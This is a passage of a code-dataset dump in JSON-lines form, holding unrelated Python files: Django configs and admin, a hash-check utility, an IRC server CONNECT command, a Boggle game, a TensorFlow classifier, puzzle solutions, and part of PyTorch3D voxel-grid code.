batch_size=1000)\n","sub_path":"scripts/populate_food_data.py","file_name":"populate_food_data.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653354325","text":"\"\"\"server URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom placement import views as placement_views\nfrom auth import views as auth_views\n\nhandler404 = 'auth_views.handler404'\nhandler500 = 'auth_views.handler500'\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include('api.urls')),\n # url(r'^notice/', include('notice.urls')),\n url(r'^placement/', include('placement.urls')),\n url(r'^auth/', include('auth.urls')),\n url(r'^login', auth_views.login_view),\n url(r'^logout', auth_views.logout_view),\n url(r'^signup', auth_views.signup_view),\n url(r'^placement/', include('auth.urls')),\n url(r'^profile', auth_views.profile_view),\n url(r'^$', placement_views.index),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nadmin.site.site_header = 'e-TPO Admin Panel'\nadmin.site.site_title = 'e-TPO Admin Panel'","sub_path":"server/server/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"353419033","text":"\"\"\"syphon.core.check.py\n\n Copyright Keithley Instruments, LLC.\n Licensed under MIT (https://github.com/tektronix/syphon/blob/master/LICENSE)\n\n\"\"\"\nimport os.path\nimport pathlib\nfrom typing import Callable, Optional\n\nimport syphon.errors\nimport syphon.hash\n\nDEFAULT_FILE = \".sha256sums\"\n\n\ndef check(\n cache_filepath: str,\n hash_filepath: Optional[str] = None,\n hash_line_split: Optional[\n Callable[[str], Optional[syphon.hash.SplitResult]]\n ] = None,\n verbose: bool = False,\n) -> bool:\n # NOTE:\n # the archive & build function use the exact same wording for \"hash_filepath\".\n \"\"\"Verify the integrity of the built cache file.\n\n Args:\n cache_filepath: Path to the target output file.\n hash_filepath: Path to a file containing a SHA256 sum of the cache. If not\n given, then the default is calculated by joining the cache directory with\n `syphon.core.check.DEFAULT_FILE`.\n hash_line_split: A callable object that returns a `syphon.hash.SplitResult`\n from a given line or None if the line is in an unexpected format. 
Returning\n None raises a MalformedLineError.\n verbose: Whether to print what is being done to the standard output.\n\n Returns:\n True if the cache file passed the integrity check, False otherwise.\n \"\"\"\n\n def _print(message: str) -> None:\n if verbose:\n print(message)\n\n actual_entry = syphon.hash.HashEntry(cache_filepath)\n if not actual_entry.filepath.exists():\n _print(f\"No file exists @ {actual_entry.filepath}\")\n return False\n\n hash_filepath = (\n os.path.join(actual_entry.filepath.parents[0], DEFAULT_FILE)\n if hash_filepath is None\n else hash_filepath\n )\n hash_path = pathlib.Path(hash_filepath)\n if not hash_path.exists():\n _print(f\"No file exists @ {hash_filepath}\")\n return False\n\n expected_entry: Optional[syphon.hash.HashEntry] = None\n try:\n # Find the hash entry for the provided cache filepath.\n with syphon.hash.HashFile(hash_filepath) as hashfile:\n hashfile.line_split = hash_line_split\n entry: syphon.hash.HashEntry\n for entry in hashfile:\n if not entry.filepath.exists():\n continue\n if actual_entry.filepath.samefile(entry.filepath):\n expected_entry = entry\n break\n except OSError:\n _print(f\"Error reading hash file @ {hash_path.absolute()}\")\n return False\n except syphon.errors.MalformedLineError as err:\n _print(f'Error parsing hash entry \"{err.line}\"')\n return False\n\n if expected_entry is None:\n _print(f'No entry for file \"{cache_filepath}\" found in \"{hash_path}\"')\n return False\n\n try:\n # The expected entry's hash will already be cached as a side-effect of reading\n # it from the hashfile. That leaves the actual entry to blame for any OSErrors.\n result: bool = expected_entry.hash == actual_entry.hash\n _print(f\"{cache_filepath}: {'OK' if result else 'FAILED'}\")\n return result\n except OSError:\n _print(f\"Error reading cache file @ {cache_filepath}\")\n return False\n","sub_path":"syphon/core/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"478235060","text":"# -*- coding: utf-8 -*-\n\n'''\n\n iteration :迭代\n迭代是什么?\n其实就是将列表&元组&字典遍历的方式叫做遍历\n不过这里字典有点特殊,默认迭代的是key值,如果需要迭代value,则是dict.values()\n下面一一讲解。\n\n'''\n\n# 1、遍历列表\n# 寻找最大值,最小值\na = [1, 2, 3, 14, 6, 17, 9]\nmin = max = a[0]\nfor i in a:\n if i > max:\n max = i\n if i < min:\n min = 1\nprint('最大值:', max)\nprint('最小值', min)\n\n\n# 2、遍历字典\n\na = {\n 'name': 'hzb',\n 'info':{\n 'height': '180',\n 'location': '上海'\n }\n}\nfor dict in a:\n print(dict)\n\nfor dict in a.values():\n print(dict)\n\n","sub_path":"python进阶/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"120307721","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Hostuser', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='phone',\n field=models.CharField(default=b'00000000000', max_length=15, validators=[django.core.validators.RegexValidator(b'^\\\\d{0,10}$')]),\n ),\n ]\n","sub_path":"Hostuser/migrations/0002_auto_20151223_0808.py","file_name":"0002_auto_20151223_0808.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"266186903","text":"from 
django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.contacts.models import Company, Contact, CompanyBankAccount\n\n\n@admin.register(Company)\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ['company_name', 'company_nip', 'company_regon',\n 'address_street', 'address_postcode', 'address_city', 'address_country']\n list_display = ['pk',\n 'company_name', 'company_nip', 'company_regon',\n 'address_street', 'address_postcode', 'address_city', 'address_country']\n\n\n@admin.register(Contact)\nclass ContactAdmin(admin.ModelAdmin):\n list_filter = ['contact_type']\n search_fields = ['company_name', 'company_nip', 'company_regon',\n 'person_first_name', 'person_last_name',\n 'address_street', 'address_postcode', 'address_city',\n 'address_country']\n list_display = ['pk', 'contact_type',\n 'company_name', 'company_nip', 'company_regon',\n 'receiver_name', 'person_first_name', 'person_last_name',\n 'address_street', 'address_postcode', 'address_city',\n 'address_country']\n fieldsets = [\n [\n None,\n {'fields': ['contact_type']}\n ],\n [\n Contact.TYPES[Contact.TYPE_PERSONAL],\n {'fields': ['person_first_name', 'person_last_name']}\n ],\n [\n Contact.TYPES[Contact.TYPE_COMPANY],\n {'fields': ['company_name', 'company_nip', 'company_regon']}\n ],\n [\n _('Address'),\n {'fields': ['address_city', 'address_street', 'address_postcode', 'address_country']}\n ],\n [\n Contact.TYPES[Contact.TYPE_GOV],\n {'fields': ['receiver_name', 'receiver_city', 'receiver_street', 'receiver_postcode', 'receiver_country']}\n ],\n ]\n\n\n@admin.register(CompanyBankAccount)\nclass CompanyBankAccountAdmin(admin.ModelAdmin):\n search_fields = ['bank_name']\n list_display = [\n 'slug', 'bank_account_number', 'iban', 'bank_name', 'bank_name',\n ]\n","sub_path":"apps/contacts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460759870","text":"from twisted.plugin import IPlugin\nfrom twisted.words.protocols import irc\nfrom txircd.module_interface import Command, ICommand, IModuleData, ModuleData\nfrom zope.interface import implements\n\nclass ConnectCommand(ModuleData, Command):\n\timplements(IPlugin, IModuleData, ICommand)\n\t\n\tname = \"ConnectCommand\"\n\tcore = True\n\t\n\tdef actions(self):\n\t\treturn [ (\"commandpermission-CONNECT\", 1, self.canConnect) ]\n\t\n\tdef userCommands(self):\n\t\treturn [ (\"CONNECT\", 1, self) ]\n\t\n\tdef canConnect(self, user, data):\n\t\tif not self.ircd.runActionUntilValue(\"userhasoperpermission\", user, \"command-connect\", users=[user]):\n\t\t\tuser.sendMessage(irc.ERR_NOPRIVILEGES, \"Permission denied - You do not have the correct operator privileges\")\n\t\t\treturn False\n\t\treturn None\n\t\n\tdef parseParams(self, user, params, prefix, tags):\n\t\tif not params:\n\t\t\tuser.sendSingleError(\"ConnectParams\", irc.ERR_NEEDMOREPARAMS, \"CONNECT\", \"Not enough parameters\")\n\t\t\treturn None\n\t\treturn {\n\t\t\t\"server\": params[0]\n\t\t}\n\t\n\tdef execute(self, user, data):\n\t\tserverName = data[\"server\"]\n\t\tif serverName in self.ircd.serverNames:\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Server {} is already on the network\".format(serverName))\n\t\telif self.ircd.connectServer(serverName):\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Connecting to {}\".format(serverName))\n\t\telse:\n\t\t\tuser.sendMessage(\"NOTICE\", \"*** Failed to connect to {}; it's likely not 
configured.\".format(serverName))\n\t\treturn True\n\nconnectCmd = ConnectCommand()","sub_path":"txircd/modules/rfc/cmd_connect.py","file_name":"cmd_connect.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"646077332","text":"import random\n'''\nIn order to watch how the code works behind the scenes, set debug to True\n'''\ndebug = False\n\ndef load_words():\n\n '''\n Loads uppered words with length >= 3 from words_alpha.txt into a set and returns it.\n '''\n\n with open('english-words-master\\english-words-master\\words_alpha.txt') as word_file:\n valid_words = set()\n for word in word_file.read().split():\n if len(word) >= 3:\n valid_words.add(word.upper())\n\n # valid_words = set(word_file.read().split())\n\n if debug: print(\"Words loaded: {}\".format('FATE' in valid_words))\n\n return valid_words\n\ndef randomize_board():\n\n '''\n Simulates rolling the standard \"Boggle\" dice into random slots on a grid and returns this as a 2D list for the game board.\n '''\n\n die = [\n ['R', 'I', 'F', 'O', 'B', 'X'],\n ['I', 'F', 'E', 'H', 'E', 'Y'],\n ['D', 'E', 'N', 'O', 'W', 'S'],\n ['U', 'T', 'O', 'K', 'N', 'D'],\n ['H', 'M', 'S', 'R', 'A', 'O'],\n ['L', 'U', 'P', 'E', 'T', 'S'],\n ['A', 'C', 'I', 'T', 'O', 'A'],\n ['Y', 'L', 'G', 'K', 'U', 'E'],\n ['Q', 'B', 'M', 'J', 'O', 'A'],\n ['E', 'H', 'I', 'S', 'P', 'N'],\n ['V', 'E', 'T', 'I', 'G', 'N'],\n ['B', 'A', 'L', 'I', 'Y', 'T'],\n ['E', 'Z', 'A', 'V', 'N', 'D'],\n ['R', 'A', 'L', 'E', 'S', 'C'],\n ['U', 'W', 'I', 'L', 'R', 'G'],\n ['P', 'A', 'C', 'E', 'M', 'D'],\n ]\n\n board = []\n\n die_indices = [i for i in range(16)]\n random.shuffle(die_indices)\n\n for index in die_indices:\n board.append(random.choice(die[index]))\n\n board = [board[0:4], board[4:8], board[8:12], board[12:]]\n\n if debug:\n print(\"Board Generated:\")\n for row in board:\n print(row)\n\n return board\n\ndef search_word(word, board, words):\n\n '''\n Verifies if the word is in the set of real words and attainable through the game board.\n '''\n\n letters = board[0]+board[1]+board[2]+board[3]\n\n if len(word) < 3:\n if debug: print(\"{} is too short.\".format(word))\n return False\n\n if word not in words:\n if debug: print(\"{} is not a word.\".format(word))\n return False\n\n if word[0] not in letters:\n if debug: print(\"{}'s first letter {} is not on the board.\".format(word, word[0]))\n return False\n\n stack = []\n for i in range(4):\n for j in range(4):\n if board[i][j] == word[0]:\n stack.append((i,j,0,[(i,j)]))\n if debug: print(\"Initial stack: {}\".format(stack))\n\n while stack:\n if debug: print(\"Current stack: {}\".format(stack))\n current = stack.pop()\n i, j, k, visited = current[0], current[1], current[2], current[3]\n\n directions = [(0,-1), (-1,-1), (-1,0), (-1,1), (0,1), (1,1), (1,0), (1,-1)]\n\n if k == len(word)-1:\n if debug: print(\"Found {} by {}\".format(word, visited))\n return True\n\n for direction in directions:\n x, y = i+direction[0], j+direction[1]\n if 0 <= x < 4 and 0 <= y < 4:\n if board[x][y] == word[k+1] and (x,y) not in visited:\n stack.append((x, y, k+1, visited+[(x, y)]))\n\n if debug: print(\"{} not on board\".format(word))\n return False\n\ndef print_board(board):\n\n '''\n Prints game board.\n '''\n\n for row in board:\n print(row)\n\ndef end_game(entered_words):\n\n '''\n Shows results of game.\n '''\n\n entered_words.sort()\n entered_words.sort(key=len, reverse=True)\n points = 0\n for word in entered_words:\n points += 200 * 
2 **(len(word)-3)\n    print(\"-----\")\n    print(\"End game.\")\n    print(\"Total points: {}\".format(points))\n    print(\"Number of words: {}\".format(len(entered_words)))\n    print(\"-----\")\n    for word in entered_words:\n        print(\"{}: {}\".format(word, 200*2**(len(word)-3)))\n\ndef play_game(board, words):\n\n    '''\n    Runs \"Boggle\".\n    '''\n\n    entered_words = []\n\n    print_board(board)\n\n    current = input(\"Enter a word you see, otherwise 0 to exit: \")\n    while current != '0':\n        current = current.upper()\n        if current in entered_words:\n            print(\"{} Already Entered!\".format(current))\n        elif search_word(current, board, words) and current not in entered_words:\n            print(\"{} Valid!\".format(current))\n            entered_words.append(current)\n        else:\n            print(\"{} Invalid!\".format(current))\n        print(\"-----\")\n        print_board(board)\n        current = input(\"Enter a word you see, otherwise 0 to exit: \")\n\n    end_game(entered_words)\n\nif debug:\n    seed = input(\"Enter random seed: \")\n    random.seed(seed)\n\nplay_game(randomize_board(), load_words())\nif debug: print(\"Seed used: {}\".format(seed))\n","sub_path":"Boggle.py","file_name":"Boggle.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"34500853","text":"# takes minutes\n\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\ndef sievePrimes(upperLimit):\n\n    marked = [0] * upperLimit # 0 = unmarked, 1 = notprime\n\n    marked[0] = 1\n    marked[1] = 1\n\n    n = 2\n    while (n * n) <= upperLimit:\n        if marked[n] == 0:\n            for i in range(n * n, upperLimit, n):\n                marked[i] = 1\n\n        n += 1\n\n    primes = []\n    for i in range(len(marked)):\n        if marked[i] == 0:\n            primes.append(i)\n\n    return primes\n\n\n# Use a set for O(1) membership tests; the limit must cover the largest\n# possible value of n**2 + a*n + b (under 2,000,000 for these ranges).\nprimeList = set(sievePrimes(2000000))\n\n\ncandidates = []\nlongestlist = 0\nfor a in range(-999,1000):\n    for b in range(-1000,1001):\n        li = []\n        listlen = 0\n        for n in range(0,1000):\n            value = n**2 + a*n + b\n            if value not in primeList:\n                if listlen > 0:\n                    candidates.append([a, b, listlen, li])\n                    if listlen > longestlist:\n                        longestlist = listlen\n                        print(a, b, listlen, li, a*b)\n                break\n            else:\n                li.append(value)\n                listlen = len(li)\n","sub_path":"0027-quadratic-primes.py","file_name":"0027-quadratic-primes.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"3754801","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import binToLabel\nfrom utils import mean_f1\n\ndef weightsIniti(shape):\n    weightsMatrix = tf.truncated_normal(shape, stddev=0.1)\n    return tf.Variable(weightsMatrix)\n\ndef biasIniti(shape):\n    biasMatrix = tf.constant(value=0.1, dtype=tf.float32, shape=shape)\n    return tf.Variable(biasMatrix)\n\ndef train( xFile,\n           yFile,\n           colNumber,\n           classNumber,\n           learningRate,\n           training_epochs,\n           batch_size,\n           display_step,\n           labelThreshold,\n           keepProb):\n    #################################\n    # Get the training data:\n    #################################\n    input = np.genfromtxt(xFile,delimiter=',',dtype=None)\n    output = np.genfromtxt(yFile,delimiter=',',dtype=None)\n\n    totalNumber = input.shape[0]\n\n\n    #################################\n    # Training Data placeholder\n    #################################\n    images = tf.placeholder(dtype=tf.float32, shape=[None, colNumber])\n    labelsTrue = tf.placeholder(dtype=tf.float32, shape=[None, classNumber])\n\n\n    #################################\n    # Weights and Bias for different layers\n    #################################\n    weights = {\n        'h0': 
weightsIniti([colNumber, 2500]),\n 'h1': weightsIniti([2500, 1024]),\n 'h2': weightsIniti([1024, 365]),\n 'h3': weightsIniti([365, classNumber])\n }\n\n biases = {\n 'b0': biasIniti([2500]),\n 'b1': biasIniti([1024]),\n 'b2': biasIniti([365]),\n 'b3': biasIniti([classNumber])\n }\n\n keepProbability = tf.placeholder(\"float\")\n\n #################################\n # Construct the model\n #################################\n layer_0 = tf.matmul(images, weights['h0']) + biases['b0']\n out_0 = tf.nn.relu(layer_0)\n out_0 = tf.nn.dropout(out_0, keepProbability)\n\n layer_1 = tf.matmul(out_0, weights['h1']) + biases['b1']\n out_1 = tf.nn.relu(layer_1)\n out_1 = tf.nn.dropout(out_1, keepProbability)\n\n layer_2 = tf.matmul(out_1, weights['h2']) + biases['b2']\n out_2 = tf.nn.relu(layer_2)\n out_2 = tf.nn.dropout(out_2, keepProbability)\n\n layer_final = tf.matmul(out_2, weights['h3']) + biases['b3']\n out_final = tf.nn.sigmoid(layer_final)\n\n\n #################################\n # Define Cost Function:\n #################################\n costFunction = tf.reduce_sum(tf.square(out_final - labelsTrue))\n optimizer = tf.train.AdamOptimizer(learningRate).minimize(costFunction)\n\n # Initializing the variables\n init = tf.initialize_all_variables()\n\n sess = tf.Session()\n sess.run(init)\n\n for epoch in range(training_epochs):\n total_batch = int(totalNumber / batch_size)\n # Loop over all batches\n for i in range(total_batch-1):\n batch_x = input[i*batch_size:(i+1)*batch_size-1, :]\n batch_y = output[i*batch_size:(i+1)*batch_size-1, :]\n sess.run(optimizer, feed_dict={images: batch_x, labelsTrue: batch_y, keepProbability: keepProb})\n\n if epoch % display_step == 0:\n yPredicted = sess.run(out_final, feed_dict={images: input, labelsTrue: output, keepProbability: 1.0})\n yPredicted[yPredicted < labelThreshold] = 0\n yPredicted[yPredicted != 0] = 1\n\n yPredicted = binToLabel(yPredicted.astype(int))\n yTrue = binToLabel(output)\n meanF1 = mean_f1(yTrue, yPredicted)\n print('Epoch: {0}\\nThe Mean F1 Score is {1:.4f} '.format(epoch, meanF1))\n\n print(\"Optimization Finished!\")\n print('%'*80 + '\\n'*3)\n\n testIn = input[1900:1999,:]\n testOut = output[1900:1999,:]\n yPredicted = sess.run(out_final, feed_dict={images: testIn, labelsTrue: testOut, keepProbability: 1.0})\n yPredicted[yPredicted < labelThreshold] = 0\n yPredicted[yPredicted != 0] = 1\n\n yPredicted = binToLabel(yPredicted.astype(int))\n yTrue = binToLabel(testOut)\n meanF1 = mean_f1(yTrue, yPredicted)\n print('The Validation Mean F1 Score is {:.4f} '.format(meanF1))\n\n sess.close()\n return meanF1\n\n\n","sub_path":"classifier/mxnn.py","file_name":"mxnn.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"406275292","text":"\"\"\"\n665. 
Non-decreasing Array\nEasy: Array\n\nGiven an array nums with n integers, your task is to check if it could become non-decreasing by modifying at most 1 element.\n\nWe define an array is non-decreasing if nums[i] <= nums[i + 1] holds for every i (0-based) such that (0 <= i <= n - 2).\n\n \n\nExample 1:\n\nInput: nums = [4,2,3]\nOutput: true\nExplanation: You could modify the first 4 to 1 to get a non-decreasing array.\nExample 2:\n\nInput: nums = [4,2,1]\nOutput: false\nExplanation: You can't get a non-decreasing array by modify at most one element.\n\"\"\"\nclass Solution:\n def checkPossibility(self, nums: List[int]) -> bool:\n n = 0\n for i in range(len(nums) - 1):\n if nums[i] > nums[i + 1]:\n n += 1\n if i == 0:\n nums[i] = nums[i + 1]\n elif nums[i - 1] <= nums[i + 1]:\n nums[i] = nums[i - 1]\n else:\n nums[i + 1] = nums[i]\n if n > 1:\n return False\n # if n > 1 or ((i-1>=0 and nums[i-1]>nums[i+1]) and (i+2 torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the world coordinate frame.\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_grids, n_points, 3)\n grid_values: an object of type Class.values_type which has tensors as\n members which have shapes derived from the get_shapes() method\n locator: a VolumeLocator object\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n points_local = locator.world_to_local_coords(points)\n # pyre-ignore[29]\n return self.evaluate_local(points_local, grid_values)\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: VoxelGridValuesBase\n ) -> torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the local coordinate frame,\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3), in a normalized form (coordinates are in [-1, 1])\n grid_values: an object of type VMFactorizedVoxelGrid.values_type which has tensors\n as members which have shapes derived from the get_shapes() method\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n raise NotImplementedError()\n\n def get_shapes(self) -> Dict[str, Tuple]:\n \"\"\"\n Using parameters from the __init__ method, this method returns the\n shapes of individual tensors needed to run the evaluate method.\n\n Returns:\n a dictionary of needed shapes. To use the evaluate_local and evaluate_world methods\n replace the shapes in the dictionary with tensors of those shapes and add the\n first 'batch' dimension. 
If the required shape is (a, b) and you want to\n have g grids than the tensor that replaces the shape should have the\n shape (g, a, b).\n \"\"\"\n raise NotImplementedError()\n\n\n@dataclass\nclass FullResolutionVoxelGridValues(VoxelGridValuesBase):\n voxel_grid: torch.Tensor\n\n\n@registry.register\nclass FullResolutionVoxelGrid(VoxelGridBase):\n \"\"\"\n Full resolution voxel grid equivalent to 4D tensor where shape is\n (features, width, height, depth) with linear interpolation between voxels.\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = FullResolutionVoxelGridValues\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: FullResolutionVoxelGridValues\n ) -> torch.Tensor:\n \"\"\"\n Evaluates the voxel grid at points in the local coordinate frame,\n The interpolation type is determined by the `mode` member.\n\n Arguments:\n points (torch.Tensor): tensor of points that you want to query\n of a form (n_points, 3), in a normalized form (coordinates are in [-1, 1])\n grid_values: an object of type values_type which has tensors as\n members which have shapes derived from the get_shapes() method\n Returns:\n torch.Tensor: shape (n_grids, n_points, n_features)\n \"\"\"\n return interpolate_volume(\n points,\n grid_values.voxel_grid,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n\n def get_shapes(self) -> Dict[str, Tuple]:\n return {\"voxel_grid\": (self.n_features, *self.resolution)}\n\n\n@dataclass\nclass CPFactorizedVoxelGridValues(VoxelGridValuesBase):\n vector_components_x: torch.Tensor\n vector_components_y: torch.Tensor\n vector_components_z: torch.Tensor\n basis_matrix: Optional[torch.Tensor] = None\n\n\n@registry.register\nclass CPFactorizedVoxelGrid(VoxelGridBase):\n \"\"\"\n Canonical Polyadic (CP/CANDECOMP/PARAFAC) Factorization factorizes the 3d grid into three\n vectors (x, y, z). For n_components=n, the 3d grid is a sum of the two outer products\n (call it ⊗) of each vector type (x, y, z):\n\n 3d_grid = x0 ⊗ y0 ⊗ z0 + x1 ⊗ y1 ⊗ z1 + ... + xn ⊗ yn ⊗ zn\n\n These tensors are passed in a object of CPFactorizedVoxelGridValues (here obj) as\n obj.vector_components_x, obj.vector_components_y, obj.vector_components_z. Their shapes are\n `(n_components, r)` where `r` is the relevant resolution.\n\n Each element of this sum has an extra dimension, which gets matrix-multiplied by an\n appropriate \"basis matrix\" of shape (n_grids, n_components, n_features). This multiplication\n brings us to the desired \"n_features\" dimensionality. If matrix_reduction=False the elements\n of different components are summed together to create (n_grids, n_components, 1) tensor.\n With some notation abuse, ignoring the interpolation operation, simplifying and denoting\n n_features as F, n_components as C and n_grids as G:\n\n 3d_grid = (x ⊗ y ⊗ z) @ basis # GWHDC x GCF -> GWHDF\n\n The basis feature vectors are passed as obj.basis_matrix.\n\n Members:\n n_components: number of vector triplets, higher number gives better approximation.\n matrix_reduction: how to transform components. If matrix_reduction=True result\n matrix of shape (n_grids, n_points, n_components) is batch matrix multiplied by the\n basis_matrix of shape (n_grids, n_components, n_features). 
If\n matrix_reduction=False, the result tensor of (n_grids, n_points, n_components)\n is summed along the rows to get (n_grids, n_points, 1).\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = CPFactorizedVoxelGridValues\n\n n_components: int = 24\n matrix_reduction: bool = True\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: CPFactorizedVoxelGridValues\n ) -> torch.Tensor:\n def factor(i):\n axis = [\"x\", \"y\", \"z\"][i]\n index = points[..., i, None]\n vector = getattr(grid_values, \"vector_components_\" + axis)\n return interpolate_line(\n index,\n vector,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n\n # collect points from all the vectors and multipy them out\n mult = factor(0) * factor(1) * factor(2)\n\n # reduce the result from\n # (n_grids, n_points, n_components) to (n_grids, n_points, n_features)\n if grid_values.basis_matrix is not None:\n # (n_grids, n_points, n_features) =\n # (n_grids, n_points, total_n_components) x (total_n_components, n_features)\n return torch.bmm(mult, grid_values.basis_matrix)\n\n return mult.sum(axis=-1, keepdim=True)\n\n def get_shapes(self) -> Dict[str, Tuple[int, int]]:\n if self.matrix_reduction is False and self.n_features != 1:\n raise ValueError(\"Cannot set matrix_reduction=False and n_features to != 1\")\n\n shape_dict = {\n \"vector_components_x\": (self.n_components, self.resolution[0]),\n \"vector_components_y\": (self.n_components, self.resolution[1]),\n \"vector_components_z\": (self.n_components, self.resolution[2]),\n }\n if self.matrix_reduction:\n shape_dict[\"basis_matrix\"] = (self.n_components, self.n_features)\n return shape_dict\n\n\n@dataclass\nclass VMFactorizedVoxelGridValues(VoxelGridValuesBase):\n vector_components_x: torch.Tensor\n vector_components_y: torch.Tensor\n vector_components_z: torch.Tensor\n matrix_components_xy: torch.Tensor\n matrix_components_yz: torch.Tensor\n matrix_components_xz: torch.Tensor\n basis_matrix: Optional[torch.Tensor] = None\n\n\n@registry.register\nclass VMFactorizedVoxelGrid(VoxelGridBase):\n \"\"\"\n Implementation of Vector-Matrix Factorization of a tensor from\n https://arxiv.org/abs/2203.09517.\n\n Vector-Matrix Factorization factorizes the 3d grid into three matrices\n (xy, xz, yz) and three vectors (x, y, z). For n_components=1, the 3d grid\n is a sum of the outer products (call it ⊗) of each matrix with its\n complementary vector:\n\n 3d_grid = xy ⊗ z + xz ⊗ y + yz ⊗ x.\n\n These tensors are passed in a VMFactorizedVoxelGridValues object (here obj)\n as obj.matrix_components_xy, obj.matrix_components_xy, obj.vector_components_y, etc.\n\n Their shapes are `(n_grids, n_components, r0, r1)` for matrix_components and\n (n_grids, n_components, r2)` for vector_componenets. Each of `r0, r1 and r2` coresponds\n to one resolution in (width, height and depth).\n\n Each element of this sum has an extra dimension, which gets matrix-multiplied by an\n appropriate \"basis matrix\" of shape (n_grids, n_components, n_features). This multiplication\n brings us to the desired \"n_features\" dimensionality. 
If matrix_reduction=False the elements\n of different components are summed together to create (n_grids, n_components, 1) tensor.\n With some notation abuse, ignoring the interpolation operation, simplifying and denoting\n n_features as F, n_components as C (which can differ for each dimension) and n_grids as G:\n\n 3d_grid = concat((xy ⊗ z), (xz ⊗ y).permute(0, 2, 1),\n (yz ⊗ x).permute(2, 0, 1)) @ basis_matrix # GWHDC x GCF -> GWHDF\n\n Members:\n n_components: total number of matrix vector pairs, this must be divisible by 3. Set\n this if you want to have equal representational power in all 3 directions. You\n must specify either n_components or distribution_of_components, you cannot\n specify both.\n distribution_of_components: if you do not want equal representational power in\n all 3 directions specify a tuple of numbers of matrix_vector pairs for each\n coordinate of a form (n_xy_planes, n_yz_planes, n_xz_planes). You must specify\n either n_components or distribution_of_components, you cannot specify both.\n matrix_reduction: how to transform components. If matrix_reduction=True result\n matrix of shape (n_grids, n_points, n_components) is batch matrix multiplied by\n the basis_matrix of shape (n_grids, n_components, n_features). If\n matrix_reduction=False, the result tensor of (n_grids, n_points, n_components)\n is summed along the rows to get (n_grids, n_points, 1).\n \"\"\"\n\n # the type of grid_values argument needed to run evaluate_local()\n values_type: ClassVar[Type[VoxelGridValuesBase]] = VMFactorizedVoxelGridValues\n\n n_components: Optional[int] = None\n distribution_of_components: Optional[Tuple[int, int, int]] = None\n matrix_reduction: bool = True\n\n def evaluate_local(\n self, points: torch.Tensor, grid_values: VMFactorizedVoxelGridValues\n ) -> torch.Tensor:\n # collect points from matrices and vectors and multiply them\n a = interpolate_plane(\n points[..., :2],\n grid_values.matrix_components_xy,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., 2:],\n grid_values.vector_components_z,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n )\n b = interpolate_plane(\n points[..., [0, 2]],\n grid_values.matrix_components_xz,\n align_corners=self.align_corners,\n padding_mode=self.padding,\n mode=self.mode,\n ) * interpolate_line(\n points[..., 1:2],\n grid_values.vector_components_y,\n 